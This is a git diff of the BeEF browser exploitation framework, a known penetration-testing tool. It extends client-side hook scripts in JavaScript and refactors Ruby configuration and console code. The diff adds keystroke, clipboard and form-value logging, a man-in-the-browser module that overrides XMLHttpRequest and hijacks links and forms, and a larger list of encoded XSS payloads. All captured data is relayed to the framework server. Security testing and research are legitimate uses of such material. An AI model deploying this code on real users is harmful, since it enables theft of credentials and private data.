return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
},
/**
@@ -363,7 +393,9 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -377,6 +409,8 @@ beef.browser = {
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -418,7 +452,8 @@ beef.browser = {
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3
@@ -431,7 +466,8 @@ beef.browser = {
if (this.isFF8()) { return '8' }; // Firefox 8
if (this.isFF9()) { return '9' }; // Firefox 9
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -492,7 +528,19 @@ beef.browser = {
return flash_installed;
}
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function() {
return (!!window.navigator.javaEnabled());
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -500,9 +548,34 @@ beef.browser = {
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function() {
if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch(e) {
return false;
}
return false;
},
@@ -674,12 +747,10 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
@@ -700,12 +771,10 @@ beef.browser = {
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(system_platform) details['SystemPlatform'] = system_platform;
if(internal_ip) details['InternalIP'] = internal_ip;
if(internal_hostname) details['InternalHostname'] = internal_hostname;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_web_socket) details['HasWebSocket'] = has_web_socket

65
core/main/client/logger.js
View File

@@ -58,9 +58,11 @@ beef.logger = {
* Starts the logger
*/
start: function() {
this.running = true;
var d = new Date();
this.time = d.getTime();
$j(document).keypress(
function(e) { beef.logger.keypress(e); }
).click(
@@ -71,9 +73,18 @@ beef.logger = {
).blur(
function(e) { beef.logger.win_blur(e); }
);
/*$j('form').submit(
$j('form').submit(
function(e) { beef.logger.submit(e); }
);*/
);
document.body.oncopy = function() {
setTimeout("beef.logger.copy();", 10);
}
document.body.oncut = function() {
setTimeout("beef.logger.cut();", 10);
}
document.body.onpaste = function() {
beef.logger.paste();
}
},
/**
@@ -137,11 +148,57 @@ beef.logger = {
},
/**
* Is called whenever a form is submitted
* Copy function fires when the user copies data to the clipboard.
*/
copy: function(x) {
try {
var c = new beef.logger.e();
c.type = 'copy';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Cut function fires when the user cuts data to the clipboard.
*/
cut: function() {
try {
var c = new beef.logger.e();
c.type = 'cut';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Paste function fires when the user pastes data from the clipboard.
*/
paste: function() {
try {
var c = new beef.logger.e();
c.type = 'paste';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Submit function fires whenever a form is submitted
* TODO: Cleanup this function
*/
submit: function(e) {
/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
try {
var f = new beef.logger.e();
var values = "";
f.type = 'submit';
f.target = beef.logger.get_dom_identifier(e.target);
for (var i = 0; i < e.target.elements.length; i++) {
values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
}
f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
this.events.push(f);
} catch(e) {}
},
/**

391
core/main/client/mitb.js
View File

@@ -1,135 +1,256 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i < lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Fetches a window.location=http://domainname.com and setting up history
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}

38
core/main/client/net/local.js
View File

@@ -21,6 +21,8 @@
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
@@ -29,16 +31,30 @@ beef.net.local = {
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(! beef.browser.hasJava()) return -1;
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
return 1;
},
/**
@@ -47,7 +63,7 @@ beef.net.local = {
* @error: return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -65,7 +81,7 @@ beef.net.local = {
* @error: return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -79,4 +95,4 @@ beef.net.local = {
};
beef.regCmp('beef.net.local');
beef.regCmp('beef.net.local');

79
core/main/client/net/xssrays.js
View File

@@ -49,20 +49,27 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
// {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
//{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
@@ -99,7 +106,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && !beef.browser.isIE()) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
}
},
@@ -181,6 +188,13 @@ beef.net.xssrays = {
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&|&amp;/);
if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i < target.search.length; i++) {
target.search[i] = target.search[i].split('=');
@@ -197,20 +211,20 @@ beef.net.xssrays = {
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
@@ -365,11 +379,20 @@ beef.net.xssrays = {
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
if(beef.browser.isIE()){
try {
var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
@@ -433,11 +456,13 @@ beef.net.xssrays = {
numOfConnections++;
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
try{
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
}
}

2
core/main/client/session.js
View File

@@ -82,7 +82,7 @@ beef.session = {
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistant: function() {
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{

5
core/main/command.rb
View File

@@ -108,7 +108,7 @@ module BeEF
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
@@ -126,6 +126,9 @@ module BeEF
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
@datastore['results'] = result
@datastore['cid'] = command_id
@datastore['beefhook'] = beefhook
end
# Returns the output of the command. These are the actual instructions sent to the browser.

21
core/main/configuration.rb
View File

@@ -19,24 +19,31 @@ module BeEF
class Configuration
include Singleton
attr_accessor :config
# antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
# of the Configuration object while having the possibility to specify a parameter to the constructor.
# This is why we don't use anymore the default Ruby implementation -> include Singleton
def self.instance()
return @@instance
end
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
def initialize(config)
raise Exception::TypeError, '"config" needs to be a string' if not config.string?
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
begin
#open base config
@config = self.load(configuration_file)
@config = self.load(config)
# set default value if key? does not exist
@config.default = nil
@@config = config
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
@@instance = self
end
# Loads yaml file

6
extensions/console/banners.rb → core/main/console/banners.rb
View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
module Banners
@@ -25,8 +25,8 @@ module Banners
# Prints BeEF's ascii art
#
def print_ascii_art
if File.exists?('extensions/console/beef.ascii')
File.open('extensions/console/beef.ascii', 'r') do |f|
if File.exists?('core/main/console/beef.ascii')
File.open('core/main/console/beef.ascii', 'r') do |f|
while line = f.gets
puts line
end

0
extensions/console/beef.ascii → core/main/console/beef.ascii
View File

34
extensions/console/commandline.rb → core/main/console/commandline.rb
View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
#
# This module parses the command line argument when running beef.
@@ -24,6 +24,8 @@ module BeEF
@options = Hash.new
@options[:verbose] = false
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@already_parsed = false
@@ -35,19 +37,27 @@ module BeEF
return @options if @already_parsed
begin
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
@options[:ascii_art] = true
end
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
end
opts.on('-v', '--verbose', 'Display debug information') do
